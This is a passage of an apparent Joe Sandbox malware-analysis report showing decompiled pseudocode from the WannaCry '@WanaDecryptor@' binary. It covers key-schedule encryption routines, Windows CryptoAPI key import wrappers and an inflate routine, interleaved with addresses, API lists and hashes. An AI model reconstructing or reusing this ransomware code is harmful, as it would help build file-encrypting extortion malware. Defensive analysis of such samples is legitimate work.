						 *(_t287 + 0x18) = _t196;
						do {
							 *_t144 = 0 << 0x18;
							_t268 =  *_t144 | 0 << 0x00000010;
							 *_t144 = _t268;
							 *_t144 = _t268;
							_t270 = _t144;
							_t282 = _t282 + 4;
							_t144 =  &(_t144[1]);
							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
							_t227 =  *(_t287 + 0x18) - 1;
							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
							 *(_t287 + 0x18) = _t227;
						} while (_t227 != 0);
						_t198 =  *((intOrPtr*)(_t287 + 0x14));
					}
					_t145 = 1;
					 *(_t287 + 0x1c) = 1;
					if( *(_t286 + 0x410) > 1) {
						_t28 = _t286 + 0x28; // 0x7c
						 *(_t287 + 0x44) = _t28;
						do {
							if(_t196 > 0) {
								_t281 = _t233;
								 *(_t287 + 0x18) =  *(_t287 + 0x44);
								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
								_t33 = _t286 + 0x434; // 0x488
								_t266 = _t33;
								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
								 *(_t287 + 0x10) = _t196;
								while(1) {
									_t266 = _t266 + 4;
									asm("cdq");
									 *(_t287 + 0x2c) = 0;
									asm("cdq");
									asm("cdq");
									_t189 =  *(_t287 + 0x18);
									 *(_t287 + 0x18) =  &(_t189[1]);
									 *(_t266 - 4) =  *(0x4179b0 +  *(_t287 + 0x2c) * 4) ^  *(0x417db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004175B0 ^  *0x004171B0 ^  *_t189;
									_t281 = _t281 + 1;
									_t192 =  *(_t287 + 0x10) - 1;
									 *(_t287 + 0x10) = _t192;
									if(_t192 == 0) {
										break;
									}
									_t207 =  *((intOrPtr*)(_t287 + 0x24));
								}
								_t233 =  *((intOrPtr*)(_t287 + 0x30));
							}
							_t79 = _t286 + 0x434; // 0x488
							_t80 = _t286 + 0x454; // 0x4a8
							_t173 = memcpy(_t80, _t79, _t196 << 2);
							_t287 = _t287 + 0xc;
							_t145 = _t173 + 1;
							_t198 =  *((intOrPtr*)(_t287 + 0x14));
							 *(_t287 + 0x1c) = _t145;
							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
						} while (_t145 <  *(_t286 + 0x410));
					}
					 *(_t287 + 0x44) = 0;
					if(_t196 > 0) {
						_t274 =  *(_t287 + 0x48);
						_t89 = _t286 + 0x454; // 0x4a8
						 *(_t287 + 0x48) = _t89;
						_t262 = _t198;
						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
						do {
							_t200 =  *(_t286 + 8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
							 *_t274 =  *0x00416FB0 ^ _t200 >> 0x00000018;
							_t275 =  &(_t274[1]);
							asm("cdq");
							 *_t275 =  *0x00416FB0 ^ _t200 >> 0x00000010;
							asm("cdq");
							_t276 =  &(_t275[1]);
							 *_t276 =  *0x00416FB0 ^ _t200 >> 0x00000008;
							_t277 =  &(_t276[1]);
							asm("cdq");
							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x416fb0) ^ _t200;
							_t274 =  &(_t277[1]);
							_t145 =  *(_t287 + 0x44) + 1;
							_t262 = _t262 + 1;
							 *(_t287 + 0x44) = _t145;
							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
						} while (_t145 < _t196);
					}
					return _t145;
				} else {
					return E0040A610(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
				}
			}






























                                  0x0040adc5
                                  0x0040adce
                                  0x0040add9
                                  0x0040ade3
                                  0x0040ade8
                                  0x0040ade9
                                  0x0040ade9
                                  0x0040adee
                                  0x0040adf7
                                  0x0040ae14
                                  0x0040ae1c
                                  0x0040ae22
                                  0x0040ae30
                                  0x0040ae24
                                  0x0040ae24
                                  0x0040ae24
                                  0x0040ae31
                                  0x0040ae36
                                  0x0040ae36
                                  0x0040ae3c
                                  0x0040ae3c
                                  0x0040ae42
                                  0x0040ae48
                                  0x0040ae4c
                                  0x0040ae50
                                  0x0040ae54
                                  0x0040ae54
                                  0x0040ae5a
                                  0x0040ae5c
                                  0x0040ae60
                                  0x0040ae63
                                  0x0040ae67
                                  0x0040ae6b
                                  0x0040ae72
                                  0x0040ae7e
                                  0x0040ae83
                                  0x0040ae8c
                                  0x0040ae90
                                  0x0040ae98
                                  0x0040ae99
                                  0x0040ae9e
                                  0x0040aeab
                                  0x0040aeac
                                  0x0040aeb0
                                  0x0040aeb0
                                  0x0040aeb6
                                  0x0040aeb6
                                  0x0040aec0
                                  0x0040aec7
                                  0x0040aecb
                                  0x0040aed1
                                  0x0040aed4
                                  0x0040aed8
                                  0x0040aeda
                                  0x0040aee4
                                  0x0040aee6
                                  0x0040aef2
                                  0x0040aef4
                                  0x0040aef4
                                  0x0040aefa
                                  0x0040aefe
                                  0x0040af02
                                  0x0040af10
                                  0x0040af12
                                  0x0040af15
                                  0x0040af26
                                  0x0040af2a
                                  0x0040af4f
                                  0x0040af72
                                  0x0040af7d
                                  0x0040af85
                                  0x0040af88
                                  0x0040af89
                                  0x0040af8a
                                  0x0040af8e
                                  0x00000000
                                  0x00000000
                                  0x0040af08
                                  0x0040af0c
                                  0x0040af94
                                  0x0040af94
                                  0x0040af9e
                                  0x0040afa4
                                  0x0040afaa
                                  0x0040afaa
                                  0x0040afb6
                                  0x0040afbc
                                  0x0040afc0
                                  0x0040afc4
                                  0x0040afc4
                                  0x0040aed8
                                  0x0040afd0
                                  0x0040afd8
                                  0x0040afde
                                  0x0040afe2
                                  0x0040afe8
                                  0x0040aff4
                                  0x0040aff6
                                  0x0040affa
                                  0x0040affe
                                  0x0040b00d
                                  0x0040b029
                                  0x0040b02b
                                  0x0040b02f
                                  0x0040b048
                                  0x0040b04c
                                  0x0040b051
                                  0x0040b06a
                                  0x0040b06c
                                  0x0040b070
                                  0x0040b08f
                                  0x0040b091
                                  0x0040b092
                                  0x0040b096
                                  0x0040b099
                                  0x0040b09d
                                  0x0040b09d
                                  0x0040affe
                                  0x0040b0ae
                                  0x0040adf9
                                  0x0040ae11
                                  0x0040ae11

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040ADD9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040ADE9
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
                                  • Instruction ID: 9bf03c186ab60868eb4058f96665f2b4dca6c7ab88ed953fee9cff2198bbc34e
                                  • Opcode Fuzzy Hash: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
                                  • Instruction Fuzzy Hash: D691BE756083858FC718CF28D8805AABBE2FFC9308F14487EE989D7351C634E956CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004046F0 Relevance: 1.5, APIs: 1, Instructions: 46encryptionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004046F0(void* __ecx, CHAR* _a4) {

				_t25 = __ecx;
				if(E004046B0(__ecx) != 0) {
					_t7 = _a4;
					if(_a4 != 0) {
						if(E004049B0( *(__ecx + 4), __ecx + 8, _t7) != 0) {
							goto L7;
						} else {
							E00404770(_t25);
							return 0;
						}
					} else {
						if(CryptImportKey( *(__ecx + 4), 0x420794, 0x494, 0, 0, __ecx + 8) != 0) {
							L7:
							return 1;
						} else {
							E00404770(_t25);
							return 0;
						}
					}
				} else {
					E00404770(__ecx);
					return 0;
				}
			}



                                  0x004046f1
                                  0x004046fa
                                  0x00404709
                                  0x0040470f
                                  0x00404751
                                  0x00000000
                                  0x00404753
                                  0x00404755
                                  0x0040475d
                                  0x0040475d
                                  0x00404711
                                  0x0040472f
                                  0x00404760
                                  0x00404766
                                  0x00404731
                                  0x00404733
                                  0x0040473b
                                  0x0040473b
                                  0x0040472f
                                  0x004046fc
                                  0x004046fe
                                  0x00404706
                                  0x00404706

                                  APIs
                                    • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                  • CryptImportKey.ADVAPI32(?,00420794,00000494,00000000,00000000,?,?,00402031,?), ref: 00404727
                                    • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
                                    • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
                                    • Part of subcall function 00404770: CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$ContextDestroy$AcquireImportRelease
                                  • String ID:
                                  • API String ID: 3621138593-0
                                  • Opcode ID: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
                                  • Instruction ID: d4e90e0c2f988709a992e7d604814048f9cd1a1bd42c9a5a50fcd20aee9fd3f8
                                  • Opcode Fuzzy Hash: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
                                  • Instruction Fuzzy Hash: 5DF019F130425156E660E675A942F9B62998BE1B08F00483BF605E72D1EB78EC42829C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004046B0 Relevance: 1.5, APIs: 1, Instructions: 26encryptionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E004046B0(void* __ecx) {
				int _t5;
				HCRYPTPROV* _t8;
				signed int _t9;

				_t9 = 0;
				_t8 = __ecx + 4;
				while(1) {
					asm("sbb eax, eax");
					_t5 = CryptAcquireContextA(_t8, 0,  ~_t9 & "Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18, 0xf0000000);
					if(_t5 != 0) {
						break;
					}
					_t9 = _t9 + 1;
					if(_t9 < 2) {
						continue;
					} else {
						return _t5;
					}
					L5:
				}
				return 1;
				goto L5;
			}






                                  0x004046b2
                                  0x004046b4
                                  0x004046b7
                                  0x004046c0
                                  0x004046cd
                                  0x004046d5
                                  0x00000000
                                  0x00000000
                                  0x004046d7
                                  0x004046db
                                  0x00000000
                                  0x004046df
                                  0x004046df
                                  0x004046df
                                  0x00000000
                                  0x004046db
                                  0x004046e7
                                  0x00000000

                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AcquireContextCrypt
                                  • String ID:
                                  • API String ID: 3951991833-0
                                  • Opcode ID: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
                                  • Instruction ID: 312dc029323720c7b5bb6801e757edcf2da9b650c6ce32f76f805a45e944d122
                                  • Opcode Fuzzy Hash: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
                                  • Instruction Fuzzy Hash: 63E0C27B35003029E320042ABC05BE786C8D7E2B61F014436FD05E6184D1598C8780D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DF30 Relevance: .5, Instructions: 515COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E0040DF30() {
				intOrPtr _t308;
				intOrPtr _t310;
				signed int _t356;
				signed int* _t361;
				signed int _t362;
				intOrPtr _t403;
				signed int _t409;
				intOrPtr _t410;
				void* _t411;
				void* _t412;

				_t410 =  *((intOrPtr*)(_t412 + 0x24));
				_t409 =  *(_t412 + 0x2c);
				_t361 =  *(_t410 + 4);
				_t411 =  *_t409;
				_t356 =  *(_t410 + 0x1c);
				 *(_t412 + 0x2c) =  *(_t409 + 4);
				_t308 =  *((intOrPtr*)(_t410 + 0x30));
				 *(_t412 + 0x28) =  *(_t410 + 0x20);
				_t403 =  *((intOrPtr*)(_t410 + 0x34));
				 *(_t412 + 0x10) = _t361;
				if(_t403 >= _t308) {
					_t310 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
				} else {
					_t310 = _t308 - _t403 - 1;
				}
				_t362 =  *_t361;
				 *((intOrPtr*)(_t412 + 0x14)) = _t310;
				if(_t362 > 9) {
					L86:
					 *(_t410 + 0x20) =  *(_t412 + 0x28);
					 *(_t410 + 0x1c) = _t356;
					 *(_t409 + 4) =  *(_t412 + 0x2c);
					_push(0xfffffffe);
					_push(_t409);
					 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
					 *_t409 = _t411;
					_push(_t410);
					 *((intOrPtr*)(_t410 + 0x34)) = _t403;
					return E0040DDA0();
				} else {
					do {
						switch( *((intOrPtr*)(_t362 * 4 +  &M0040E6CC))) {
							case 0:
								if(_t310 < 0x102 ||  *(_t412 + 0x2c) < 0xa) {
									L12:
									_t315 =  *(_t412 + 0x10);
									 *_t315 = 1;
									_t315[3] = 0;
									_t315[2] = _t315[5];
									goto L13;
								} else {
									 *(_t410 + 0x20) =  *(_t412 + 0x28);
									 *(_t410 + 0x1c) = _t356;
									 *(_t409 + 4) =  *(_t412 + 0x2c);
									 *_t409 = _t411;
									_t349 =  *(_t412 + 0x10);
									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
									_push(_t409);
									_push(_t410);
									_push(_t349[6]);
									_push(_t349[5]);
									_push(0);
									_push(0);
									_t350 = E0040FBC0();
									_t411 =  *_t409;
									_t356 =  *(_t410 + 0x1c);
									 *(_t412 + 0x44) =  *(_t409 + 4);
									_t397 =  *((intOrPtr*)(_t410 + 0x30));
									 *(_t412 + 0x40) =  *(_t410 + 0x20);
									_t403 =  *((intOrPtr*)(_t410 + 0x34));
									_t412 = _t412 + 0x18;
									 *(_t412 + 0x30) = _t350;
									if(_t403 >= _t397) {
										_t399 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
									} else {
										_t399 = _t397 - _t403 - 1;
									}
									 *((intOrPtr*)(_t412 + 0x14)) = _t399;
									if(_t350 == 0) {
										goto L12;
									} else {
										asm("sbb eax, eax");
										 *( *(_t412 + 0x10)) = ( ~(_t350 - 1) & 0x00000002) + 7;
										_t310 =  *((intOrPtr*)(_t412 + 0x14));
										goto L85;
									}
								}
								goto L99;
							case 1:
								L13:
								_t317 = ( *(_t412 + 0x10))[3];
								 *(_t412 + 0x18) = _t317;
								if(_t356 >= _t317) {
									L16:
									_t321 = ( *(_t412 + 0x10))[2] + ( *(0x41a260 + _t317 * 4) &  *(_t412 + 0x28)) * 8;
									 *(_t412 + 0x18) = _t321;
									 *((intOrPtr*)(_t412 + 0x1c)) = 0;
									 *(_t412 + 0x28) =  *(_t412 + 0x28) >>  *(_t321 + 1);
									_t373 =  *(_t412 + 0x18);
									_t356 = _t356;
									_t326 =  *_t373;
									if(0 != 0) {
										if((_t326 & 0x00000010) == 0) {
											if((_t326 & 0x00000040) == 0) {
												goto L34;
											} else {
												_t329 =  *(_t412 + 0x10);
												if((_t326 & 0x00000020) == 0) {
													 *_t329 = 9;
													 *(_t409 + 0x18) = "invalid literal/length code";
													goto L90;
												} else {
													 *_t329 = 7;
													_t310 =  *((intOrPtr*)(_t412 + 0x14));
													goto L85;
												}
											}
										} else {
											_t381 =  *(_t412 + 0x10);
											_t381[2] = 0;
											 *_t381 = 2;
											_t381[1] =  *( *(_t412 + 0x18) + 4);
											_t310 =  *((intOrPtr*)(_t412 + 0x14));
											goto L85;
										}
									} else {
										_t337 =  *(_t412 + 0x10);
										_t337[2] =  *(_t373 + 4);
										 *_t337 = 6;
										_t310 =  *((intOrPtr*)(_t412 + 0x14));
										goto L85;
									}
								} else {
									while(1) {
										_t338 =  *(_t412 + 0x2c);
										if(_t338 == 0) {
											goto L88;
										}
										 *(_t412 + 0x2c) = _t338 - 1;
										_t345 = 0 << _t356;
										_t356 = _t356 + 8;
										 *(_t412 + 0x30) = 0;
										_t317 =  *(_t412 + 0x18);
										_t411 = _t411 + 1;
										 *(_t412 + 0x28) =  *(_t412 + 0x28) | _t345;
										if(_t356 < _t317) {
											continue;
										} else {
											goto L16;
										}
										goto L99;
									}
									goto L88;
								}
								goto L99;
							case 2:
								__ecx =  *(__esp + 0x10);
								__eax =  *( *(__esp + 0x10) + 8);
								 *(__esp + 0x18) = __eax;
								if(__ebx >= __eax) {
									L26:
									__ecx =  *(0x41a260 + __eax * 4);
									__eax =  *(__esp + 0x28);
									__ecx = __ecx &  *(__esp + 0x28);
									__eax =  *(__esp + 0x10);
									 *((intOrPtr*)( *(__esp + 0x10) + 4)) =  *((intOrPtr*)( *(__esp + 0x10) + 4)) + __ecx;
									__ecx =  *(__esp + 0x18);
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									__eax =  *(__esp + 0x18);
									__ebx = __ebx -  *(__esp + 0x18);
									__eax =  *(__esp + 0x10);
									__ecx = 0;
									__cl =  *((intOrPtr*)(__eax + 0x11));
									 *__eax = 3;
									 *(__eax + 0xc) = 0;
									__ecx =  *(__eax + 0x18);
									 *(__eax + 8) =  *(__eax + 0x18);
									goto L28;
								} else {
									while(1) {
										__eax =  *(__esp + 0x2c);
										if(__eax == 0) {
											goto L88;
										}
										__eax = __eax - 1;
										__ecx = __ebx;
										 *(__esp + 0x2c) = __eax;
										__eax = 0;
										__al =  *__ebp;
										__ebx = __ebx + 8;
										__eax = 0 << __cl;
										__ecx =  *(__esp + 0x28);
										 *(__esp + 0x30) = 0;
										__ecx =  *(__esp + 0x28) | 0 << __cl;
										__eax =  *(__esp + 0x18);
										__ebp = __ebp + 1;
										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
										if(__ebx < __eax) {
											continue;
										} else {
											goto L26;
										}
										goto L99;
									}
									goto L88;
								}
								goto L99;
							case 3:
								__eax =  *(__esp + 0x10);
								L28:
								__eax =  *(__eax + 0xc);
								 *(__esp + 0x18) = __eax;
								if(__ebx >= __eax) {
									L31:
									__ecx =  *(0x41a260 + __eax * 4);
									__eax =  *(__esp + 0x28);
									__ecx = __ecx &  *(__esp + 0x28);
									 *(__esp + 0x10) =  *( *(__esp + 0x10) + 8);
									__eax =  *( *(__esp + 0x10) + 8) + __ecx * 8;
									__ecx = 0;
									 *(__esp + 0x18) = __eax;
									__cl =  *((intOrPtr*)(__eax + 1));
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									 *(__esp + 0x1c) = 0;
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									__eax = 0;
									__ecx =  *(__esp + 0x18);
									__ebx = __ebx;
									__eax = 0;
									__al =  *( *(__esp + 0x18));
									if((__al & 0x00000010) == 0) {
										if((__al & 0x00000040) != 0) {
											__eax =  *(__esp + 0x10);
											 *( *(__esp + 0x10)) = 9;
											__edi[6] = "invalid distance code";
											L90:
											 *(_t410 + 0x20) =  *(_t412 + 0x28);
											 *(_t410 + 0x1c) = _t356;
											 *(_t409 + 4) =  *(_t412 + 0x2c);
											_push(0xfffffffd);
											_push(_t409);
											 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
											 *_t409 = _t411;
											_push(_t410);
											 *((intOrPtr*)(_t410 + 0x34)) = _t403;
											return E0040DDA0();
										} else {
											L34:
											( *(_t412 + 0x10))[3] = _t326;
											( *(_t412 + 0x10))[2] =  *(_t412 + 0x18) +  *( *(_t412 + 0x18) + 4) * 8;
											_t310 =  *((intOrPtr*)(_t412 + 0x14));
											goto L85;
										}
									} else {
										__ecx =  *(__esp + 0x10);
										__eax = 0;
										 *((intOrPtr*)(__ecx + 8)) = 0;
										 *(__esp + 0x18) =  *( *(__esp + 0x18) + 4);
										 *__ecx = 4;
										 *(__ecx + 0xc) =  *( *(__esp + 0x18) + 4);
										__eax =  *(__esp + 0x14);
										goto L85;
									}
								} else {
									while(1) {
										__eax =  *(__esp + 0x2c);
										if(__eax == 0) {
											goto L88;
										}
										__eax = __eax - 1;
										__ecx = __ebx;
										 *(__esp + 0x2c) = __eax;
										__eax = 0;
										__al =  *__ebp;
										__ebx = __ebx + 8;
										__eax = 0 << __cl;
										__ecx =  *(__esp + 0x28);
										 *(__esp + 0x30) = 0;
										__ecx =  *(__esp + 0x28) | 0 << __cl;
										__eax =  *(__esp + 0x18);
										__ebp = __ebp + 1;
										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
										if(__ebx < __eax) {
											continue;
										} else {
											goto L31;
										}
										goto L99;
									}
									goto L88;
								}
								goto L99;
							case 4:
								__eax =  *(__esp + 0x10);
								__eax =  *( *(__esp + 0x10) + 8);
								 *(__esp + 0x18) = __eax;
								if(__ebx >= __eax) {
									L38:
									__ecx =  *(0x41a260 + __eax * 4);
									__eax =  *(__esp + 0x28);
									__ecx = __ecx &  *(__esp + 0x28);
									__eax =  *(__esp + 0x10);
									 *((intOrPtr*)( *(__esp + 0x10) + 0xc)) =  *((intOrPtr*)( *(__esp + 0x10) + 0xc)) + __ecx;
									__ecx =  *(__esp + 0x18);
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									__eax =  *(__esp + 0x18);
									__ebx = __ebx -  *(__esp + 0x18);
									__eax =  *(__esp + 0x10);
									 *( *(__esp + 0x10)) = 5;
									goto L39;
								} else {
									while(1) {
										__eax =  *(__esp + 0x2c);
										if(__eax == 0) {
											break;
										}
										__ecx = 0;
										__eax = __eax - 1;
										__cl =  *__ebp;
										 *(__esp + 0x2c) = __eax;
										__eax = 0;
										__ecx = __ebx;
										__eax = 0 << __cl;
										__ecx =  *(__esp + 0x28);
										__ebx = __ebx + 8;
										 *(__esp + 0x30) = 0;
										__ecx =  *(__esp + 0x28) | 0 << __cl;
										__eax =  *(__esp + 0x18);
										__ebp = __ebp + 1;
										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
										if(__ebx < __eax) {
											continue;
										} else {
											goto L38;
										}
										goto L99;
									}
									L88:
									 *(_t410 + 0x1c) = _t356;
									 *(_t410 + 0x20) =  *(_t412 + 0x28);
									 *(_t409 + 4) = 0;
									 *_t409 = _t411;
									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
									_push( *(_t412 + 0x30));
									_push(_t409);
									_push(_t410);
									return E0040DDA0();
								}
								goto L99;
							case 5:
								L39:
								__ecx =  *(__esp + 0x10);
								__eax = __edx;
								__eax = __edx -  *((intOrPtr*)( *(__esp + 0x10) + 0xc));
								__ecx =  *(__esi + 0x28);
								 *(__esp + 0x1c) = __eax;
								if(__eax < __ecx) {
									__eax =  *(__esi + 0x2c);
									__eax =  *(__esi + 0x2c) - __ecx;
									__ecx =  *(__esp + 0x1c);
									 *(__esp + 0x20) = __eax;
									while(1) {
										__ecx = __ecx + __eax;
										__eax =  *(__esi + 0x28);
										if(__ecx >=  *(__esi + 0x28)) {
											break;
										}
										__eax =  *(__esp + 0x20);
									}
									 *(__esp + 0x1c) = __ecx;
								}
								__ecx =  *(__esp + 0x10);
								__eax =  *(__ecx + 4);
								__eax =  *(__esp + 0x14);
								if( *(__ecx + 4) != 0) {
									do {
										if(__eax != 0) {
											goto L62;
										} else {
											__eax =  *(__esi + 0x2c);
											 *(__esp + 0x18) = __eax;
											if(__edx != __eax) {
												L52:
												 *(__esi + 0x34) = __edx;
												__edx =  *(__esp + 0x30);
												_push( *(__esp + 0x30));
												_push(__edi);
												_push(__esi);
												__eax = E0040DDA0();
												__edx =  *(__esi + 0x34);
												 *(__esp + 0x3c) = __eax;
												__eax =  *(__esi + 0x30);
												__esp = __esp + 0xc;
												 *(__esp + 0x20) = __eax;
												if(__edx >= __eax) {
													__eax =  *(__esi + 0x2c);
													__eax =  *(__esi + 0x2c) - __edx;
												} else {
													__eax = __eax - __edx;
													__eax = __eax - 1;
												}
												__ecx =  *(__esi + 0x2c);
												 *(__esp + 0x14) = __eax;
												 *(__esp + 0x18) = __ecx;
												if(__edx == __ecx) {
													__ecx =  *(__esi + 0x28);
													__eax =  *(__esp + 0x20);
													if(__eax == __ecx) {
														__eax =  *(__esp + 0x14);
													} else {
														__edx = __ecx;
														if(__edx >= __eax) {
															__eax =  *(__esp + 0x18);
															__eax =  *(__esp + 0x18) - __edx;
														} else {
															__eax = __eax - __edx;
															__eax = __eax - 1;
														}
													}
												}
												if(__eax == 0) {
													goto L91;
												} else {
													goto L62;
												}
											} else {
												__eax =  *(__esi + 0x30);
												__ecx =  *(__esi + 0x28);
												if(__eax == __ecx) {
													goto L52;
												} else {
													__edx = __ecx;
													if(__edx >= __eax) {
														__eax =  *(__esp + 0x18);
														__eax =  *(__esp + 0x18) - __edx;
													} else {
														__eax = __eax - __edx;
														__eax = __eax - 1;
													}
													if(__eax != 0) {
														goto L62;
													} else {
														goto L52;
													}
												}
											}
										}
										goto L99;
										L62:
										__ecx =  *(__esp + 0x1c);
										__edx = __edx + 1;
										 *(__esp + 0x30) = 0;
										__cl =  *( *(__esp + 0x1c));
										 *(__edx - 1) = __cl;
										__ecx =  *(__esp + 0x1c);
										__ecx =  *(__esp + 0x1c) + 1;
										__eax = __eax - 1;
										 *(__esp + 0x1c) = __ecx;
										 *(__esp + 0x14) = __eax;
										if(__ecx ==  *(__esi + 0x2c)) {
											__ecx =  *(__esi + 0x28);
											 *(__esp + 0x1c) =  *(__esi + 0x28);
										}
										__ecx =  *(__esp + 0x10);
										_t212 = __ecx + 4;
										 *_t212 =  *(__ecx + 4) - 1;
									} while ( *_t212 != 0);
								}
								goto L84;
							case 6:
								if(__eax != 0) {
									L83:
									__ecx =  *(__esp + 0x10);
									__edx = __edx + 1;
									__eax = __eax - 1;
									 *(__esp + 0x30) = 0;
									__cl =  *( *(__esp + 0x10) + 8);
									 *(__esp + 0x14) = __eax;
									 *(__edx - 1) = __cl;
									__ecx =  *(__esp + 0x10);
									L84:
									 *__ecx = 0;
									goto L85;
								} else {
									__eax =  *(__esi + 0x2c);
									 *(__esp + 0x18) = __eax;
									if(__edx != __eax) {
										L73:
										 *(__esi + 0x34) = __edx;
										__edx =  *(__esp + 0x30);
										_push( *(__esp + 0x30));
										_push(__edi);
										_push(__esi);
										__eax = E0040DDA0();
										__edx =  *(__esi + 0x34);
										 *(__esp + 0x3c) = __eax;
										__eax =  *(__esi + 0x30);
										__esp = __esp + 0xc;
										 *(__esp + 0x20) = __eax;
										if(__edx >= __eax) {
											__eax =  *(__esi + 0x2c);
											__eax =  *(__esi + 0x2c) - __edx;
										} else {
											__eax = __eax - __edx;
											__eax = __eax - 1;
										}
										__ecx =  *(__esi + 0x2c);
										 *(__esp + 0x14) = __eax;
										 *(__esp + 0x18) = __ecx;
										if(__edx == __ecx) {
											__ecx =  *(__esi + 0x28);
